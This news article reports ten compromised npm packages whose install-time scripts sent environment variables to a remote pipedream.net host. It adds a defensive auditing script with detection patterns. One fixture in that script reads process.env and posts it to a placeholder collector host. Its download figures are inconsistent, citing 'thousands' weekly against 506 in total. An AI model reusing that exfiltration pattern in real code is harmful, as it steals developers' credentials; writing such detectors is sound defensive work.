In an alarming development for the developer community, ten popular npm packages were compromised yesterday with malicious code designed to steal sensitive data from developers’ systems. This attack, which specifically targeted cryptocurrency-related npm packages, resulted in the spread of a data-stealing JavaScript that puts API keys, cloud credentials, database credentials, and encryption keys at risk. With some of the affected packages being downloaded thousands of times per week, developers must remain vigilant about their software supply chains.
The Incident
Yesterday, a set of ten npm packages were updated with harmful code designed to steal sensitive information from the environment variables of developers’ systems. This included API keys, database credentials, cloud access keys, and encryption secrets. The most widely downloaded of the affected packages was ‘country-currency-map’. These compromised packages were discovered by Sonatype researcher Ali ElShakankiry.
The malicious code was embedded in two scripts, “/scripts/launch.js” and “/scripts/diagnostic-report.js”, both of which execute as soon as the package is installed. The malware sends the stolen data to a remote server hosted at “eoi2ectd5a5tn1h.m.pipedream.net”. Environment variables of this kind are valuable targets because they grant access to critical infrastructure and systems, which cybercriminals can use for further attacks.
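Because the payload ran from install-time lifecycle hooks, a useful defensive check is to audit a package's package.json for hooks that run during "npm install" and inspect what they execute. The following script is an added example written for this page, not code from the article or from Sonatype. The hook names are npm's real install-time lifecycle events; the two manifests and script bodies it scans are constructed fixtures modelled on the behaviour the article describes (reading process.env and posting it to a remote host), with a placeholder collector hostname.

```javascript
// Added example (not from the article or Sonatype): audit a package manifest for
// npm install-time lifecycle hooks and flag indicators of environment-variable theft.
const INSTALL_HOOKS = ['preinstall', 'install', 'postinstall'];

// Indicators to look for in the hook command and, when available, the script it runs.
const INDICATORS = [
  { name: 'env-read', re: /process\.env\b/ },
  { name: 'network', re: /\b(https?\.request|fetch|axios|net\.connect)\b/ },
  { name: 'remote-url', re: /https?:\/\/[^\s'"`]+/ },
];

// manifest: parsed package.json; files: map of relative script path -> file text.
function auditInstallHooks(manifest, files = {}) {
  const findings = [];
  const scripts = manifest.scripts || {};
  for (const hook of INSTALL_HOOKS) {
    const command = scripts[hook];
    if (!command) continue;
    // If the hook runs "node <file>" and that file's text was supplied, inspect it too.
    const m = command.match(/\bnode\s+([^\s&;|]+)/);
    const body = m && files[m[1]] ? files[m[1]] : '';
    const haystack = `${command}\n${body}`;
    const indicators = INDICATORS.filter(({ re }) => re.test(haystack)).map(({ name }) => name);
    findings.push({ package: manifest.name, version: manifest.version, hook, command, indicators });
  }
  return findings;
}

// Constructed fixture: a postinstall hook that runs a bundled script which serialises
// process.env and sends it to a placeholder collector host (hostname is invented).
const SUSPICIOUS_PKG = {
  manifest: { name: 'example-compromised', version: '9.9.9', scripts: { postinstall: 'node scripts/launch.js' } },
  files: {
    'scripts/launch.js':
      "const https = require('https');\n" +
      'const payload = JSON.stringify(process.env);\n' +
      "https.request('https://collector.example.invalid/upload', { method: 'POST' }).end(payload);\n",
  },
};

// Constructed fixture: a package whose install hook only prepares a build directory.
const BENIGN_PKG = {
  manifest: { name: 'example-benign', version: '1.0.0', scripts: { postinstall: 'node scripts/build.js', test: 'jest' } },
  files: { 'scripts/build.js': "require('fs').mkdirSync('dist', { recursive: true });\n" },
};

function summarize(pkg) {
  return auditInstallHooks(pkg.manifest, pkg.files).map(
    (f) => `${f.package}@${f.version} ${f.hook}: "${f.command}" -> ${f.indicators.join(', ') || 'no indicators'}`
  );
}

console.log(summarize(SUSPICIOUS_PKG).concat(summarize(BENIGN_PKG)).join('\n'));
```

Any install hook deserves a look before the package is trusted, but one that both reads process.env and opens a network connection is the pattern this incident used. Installing with `npm install --ignore-scripts` (or `npm config set ignore-scripts true`) prevents these hooks from running at all, so the review can happen before any code executes.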
Sonatype researchers, including malware analyst Ax Sharma, point out that the root cause of this incident is likely the compromise of npm maintainer accounts. These accounts may have been taken over either via credential stuffing (where attackers try passwords leaked in previous breaches) or through an expired domain takeover, two common ways that npm packages get hijacked. Given that multiple packages from different maintainers were compromised at once, the domain-takeover scenario seems less likely; the more plausible explanation is that attackers logged into the maintainers’ accounts with reused or previously leaked credentials.
The list of affected packages includes:
– country-currency-map: version 2.1.8, 288 downloads.
– @keepkey/device-protocol: version 7.13.3, 56 downloads.
– bnb-javascript-sdk-nobroadcast: version 2.16.16, 61 downloads.
– @bithighlander/bitcoin-cash-js-lib: version 5.2.2, 61 downloads.
– eslint-config-travix: version 6.3.1, 0 downloads.
– babel-preset-travix: version 1.2.1, 0 downloads.
– @travix/ui-themes: version 1.1.5, 0 downloads.
– @veniceswap/uikit: version 0.65.34, 0 downloads.
– @crosswise-finance1/sdk-v2: version 0.1.21, 0 downloads.
– @veniceswap/eslint-config-pancake: version 1.6.2, 0 downloads.
All but country-currency-map remain available for download on npm. As a precaution, the maintainer of the country-currency-map package deprecated the malicious version (2.1.8) and advised developers to use version 2.1.7 instead, which remains safe.
What Undercode Says:
This attack underscores the ongoing risks associated with the open-source ecosystem, especially in package management systems like npm. While tools like npm offer convenience and power to developers, they also create a prime attack vector for cybercriminals. The fact that these packages were updated with malicious scripts without the knowledge of the maintainers suggests a lapse in security. It’s not just about keeping the code itself secure but also ensuring that the processes around managing and maintaining these repositories are robust.
The attack is particularly alarming given the high frequency of downloads of some of the affected packages. This highlights the scale of the issue, as widespread adoption means a larger pool of potential victims. But what stands out is that the malware wasn’t immediately noticed by the wider community. The discovery of this breach was only made by Sonatype researchers, which raises the question of how long such attacks could have continued if left undetected.
The fact that npm now requires two-factor authentication (2FA) for popular packages is a step in the right direction. However, many of the affected packages had not been updated in years, which could indicate that their maintainers were no longer actively monitoring or securing them. This points to a broader issue in the open-source community, where older projects can fall into neglect. A simple compromise of the maintainer’s login credentials can be disastrous when these packages are widely used by developers around the world.
Moreover, the account-takeover tactics used in this attack, credential stuffing and domain takeover, are not new, but they are effective. Maintaining strong, unique passwords and ensuring proper security hygiene around domain registration and account management could have prevented this breach from occurring. Additionally, npm needs to improve its approach to safeguarding abandoned or inactive packages, as these are often low-hanging fruit for attackers.
The real challenge, however, lies in ensuring developers remain aware of these risks. Open-source ecosystems are a double-edged sword, where the benefits of collaborative development come with the downside of relying on others’ security practices. Developers need to be vigilant when integrating third-party packages into their projects. One small mistake or overlooked vulnerability can cascade into significant issues—especially when the compromised code is running on systems that are connected to sensitive data.
Fact Checker Results:
- Sonatype’s research confirms that the malicious scripts were embedded in specific npm package versions and executed on installation.
- The attack harvested environment variables to exfiltrate sensitive data, a well-known tactic in modern cyber attacks.
- The compromised versions were downloaded a total of 506 times, with the country-currency-map package being the most widely downloaded.
References:
Reported By: https://www.bleepingcomputer.com/news/security/infostealer-campaign-compromises-10-npm-packages-targets-devs/